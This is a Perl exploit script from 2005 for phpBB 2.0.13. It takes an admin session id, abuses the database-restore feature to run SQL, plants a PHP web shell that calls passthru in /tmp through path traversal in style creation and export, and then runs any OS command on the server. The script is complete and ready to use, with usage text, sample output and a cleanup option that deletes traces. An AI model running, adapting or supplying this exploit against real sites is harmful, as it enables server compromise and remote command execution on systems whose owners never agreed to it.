#!/usr/bin/perl ### r57phpbb_admin2exec.pl ### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ### phpBB admin_styles.php commands execution exploit ### tested on phpBB 2.0.13 ### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ### by 1dt.w0lf ### RST/GHC ### http://rst.void.ru ### http://ghc.ru ### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ### screen ### r57phpbb_admin2exec.pl -p http://blah.com/phpBB/admin/ -s 0864cb0abb396319c589ebc2a98c2c5d -c get_prefix ### ----------------------------------------------------------------------------------- ### [~] Try to get prefix ...[ DONE ] ### PREFIX : phpbb_ ### ----------------------------------------------------------------------------------- ### ### r57phpbb_admin2exec.pl -p http://blah.com/phpBB/admin/ -s 0864cb0abb396319c589ebc2a98c2c5d -P phpbb_ ### ----------------------------------------------------------------------------------- ### [!] Method 2 - use "create\export style" ### [~] Try to run sql query in database ... [ DONE ] ### [~] Creating new style ... [ DONE ] ### [~] Creating file ... [ DONE ] ### [+] File successfully created! Now you can try execute command! ### [~] Delete style from database ... [ DONE ] ### ----------------------------------------------------------------------------------- ### ### r57phpbb_admin2exec.pl -p http://blah.com/phpBB/admin/ -s 0864cb0abb396319c589ebc2a98c2c5d -c "uname -sr; id" ### ----------------------------------------------------------------------------------- ### FreeBSD 5.3-RELEASE ### uid=80(www) gid=80(www) groups=80(www) ### ----------------------------------------------------------------------------------- ### 20.04.2005 use LWP::UserAgent; use Getopt::Std; getopts("p:s:P:c:m:"); $path = $opt_p; $sid = $opt_s; $prefix = $opt_P || 'phpbb_'; $cmd = $opt_c || 'create'; $method = $opt_m || 2; #################### LITTLE CONFIG # forum on win or unix? commands split by ; or && $cmdspl = ';'; # unix # filename for create. default is 'theme_info.cfg' for include in admin_styles.php?mode=addnew # DONT CHANGE if you don't know that you do!!! $filename = '/theme_info.cfg'; # folder for create file, we need folder writable for apache user, by default we use /tmp $dir = '../../../../../../../../../../../../../../../../../../../../../tmp'; #################### END CONFIG if(!$path || !$sid) { &usage; } $xpl = LWP::UserAgent->new() or die; if($cmd eq 'clear') { &show_header; print "-----------------------------------------------------------------------------------\n"; print "[~] Clearing database ... "; $sql = 'DELETE FROM `'.$prefix.'themes` WHERE style_name="" AND template_name="";'; $suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); if(!$suc) { print " [ FAILED ]\n"; exit(); } if($suc == 1) { print " [ DONE ]\n"; } print "-----------------------------------------------------------------------------------\n"; exit(); } if($cmd eq 'create' && $method == 1) { &show_header; print "-----------------------------------------------------------------------------------\n"; print "[!] Method 1 - use \"INTO OUTFILE\"\n"; print "[!] Create file for including.\n"; print "[~] Try to run sql query in database..."; $sql = 'SELECT \'\' FROM '.$prefix.'users LIMIT 1 INTO OUTFILE \''.$dir.$filename.'\';'; $suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); if(!$suc) { print " [ FAILED ]\n"; exit(); } if($suc == 2) { print " [ DONE ]\n[!] File already exists! Now you can try execute command!\n"; } if($suc == 1) { print " [ DONE ]\n[+] File successfully created! Now you can try execute command!\n"; } print "-----------------------------------------------------------------------------------\n"; exit(); } if($cmd eq 'get_prefix') { &show_header; print "-----------------------------------------------------------------------------------\n"; print "[~] Try to get prefix ..."; $res = $xpl->get( "${path}admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=0&backupstart=1&gzipcompress=0&startdownload=1&sid=$sid" ); if($res->is_success && $res->content =~ /(TABLE: )(.*)(auth_access)/) { $prefix = ($2)?($2):("No prefix"); print "[ DONE ]\nPREFIX : $prefix\n"; } else { print "[ FAILED ]\n"; } print "-----------------------------------------------------------------------------------\n"; exit(0); } if($cmd eq 'create' && $method == 2) { &show_header; print "-----------------------------------------------------------------------------------\n"; print "[!] Method 2 - use \"create\\export style\"\n"; print "[~] Try to run sql query in database ..."; $sql = 'ALTER TABLE `'.$prefix.'themes` CHANGE `template_name` `template_name` VARCHAR( 255 ) NOT NULL;'; $suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); if(!$suc) { print " [ FAILED ]\n"; exit(); } if($suc == 1) { print " [ DONE ]\n"; } print "[~] Creating new style ..."; $res = $xpl->post( "${path}admin_styles.php?sid=$sid", [ 'style_name' => '0wn', 'template_name' => 'a=12;passthru($_POST[jagajaga]);exit(0);//'.$dir, 'mode' => 'create', 'submit' => 'Save Settings' ], ); if($res->is_success){ print " [ DONE ]\n[~] Creating file ..."; } else { print " [ FAILED ]\n"; exit(0); } $res = $xpl->post( "${path}admin_styles.php?sid=$sid", [ 'export_template' => 'a=12;passthru($_POST[jagajaga]);exit(0);//'.$dir, 'mode' => 'export', 'edit' => 'Submit' ], ); if($res->is_success) { print " [ DONE ]\n[+] File successfully created! Now you can try execute command!\n"; } else { print " [ FAILED ]\n"; exit(0); } print "[~] Delete style from database ..."; $sql = 'DELETE FROM `'.$prefix.'themes` WHERE style_name="0wn";'; &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); print " [ DONE ]\n"; print "-----------------------------------------------------------------------------------\n"; exit(0); } $jagajaga = 'echo _GHC/RST_ '; $jagajaga .= $cmdspl; $jagajaga .= $cmd; $jagajaga .= $cmdspl; $jagajaga .= ' echo _GHC/RST_'; $res = $xpl->post( "${path}admin_styles.php?mode=addnew&sid=${sid}&install_to=${dir}", [ 'jagajaga' => "$jagajaga" ] ); &show_header; if($res->content =~ /main\(\): Failed opening/) { print "[-] Error!\nFailed include file! Maybe you forgot create shell file first?\n"; exit(); } @rez = split("_GHC/RST_",$res->content); print "-----------------------------------------------------------------------------------\n"; print @rez[1]; print "-----------------------------------------------------------------------------------\n"; sub usage(){ print "-----------------------------------------------------------------------------------\n"; print " phpBB admin_styles.php command execution exploit by 1dt.w0lf\n"; print "-----------------------------------------------------------------------------------\n"; print "Usage: $0 [options]\n"; print "\nOptions:\n\n"; print " -p path to phpBB admin interface e.g. http://site.com/phpBB/admin/\n\n"; print " -s admin sid ... yeeesss you need admin rights for use this exploit =)\n\n"; print " -P database prefix (optional) default \"phpbb_\"\n\n"; print " -c [create|clear|get_prefix|(any unix/win command)]\n\n"; print " \"create\" for first create shell *default\n"; print " \"clear\" for delete our NULL styles from database\n"; print " \"get_prefix\" get table prefix\n"; print " \"any unix or win commands\" for commands execute =)\n\n"; print " -m method [1|2] (optional) default \"2\"\n\n"; print " 1 - use mysql function \"INTO OUTFILE\" for creating new file\n"; print " 2 - use phpBB functions \"create style\" and \"export style\" for create new file\n"; print "-----------------------------------------------------------------------------------\n"; print " RST/GHC private stuff , http://rst.void.ru , http://ghc.ru\n"; exit(); } sub show_header() { print "-----------------------------------------------------------------------------------\n"; print " phpBB admin_styles.php command execution exploit by RST/GHC\n"; print "-----------------------------------------------------------------------------------\n"; } sub phpbb_sql_query($$){ $res = $xpl->post("$_[0]", Content_type => 'form-data', Content => [ perform => 'restore', restore_start => 'Start Restore', backup_file => [ undef, '0wneeeeedddd', Content_type => 'text/plain', Content => "$_[1]", ], ] ); if ($res->is_success) { if ($res->content =~ /already exists/) { return 2; } if ($res->content =~ /The Database has been successfully restored/) { return 1; } } return 0; }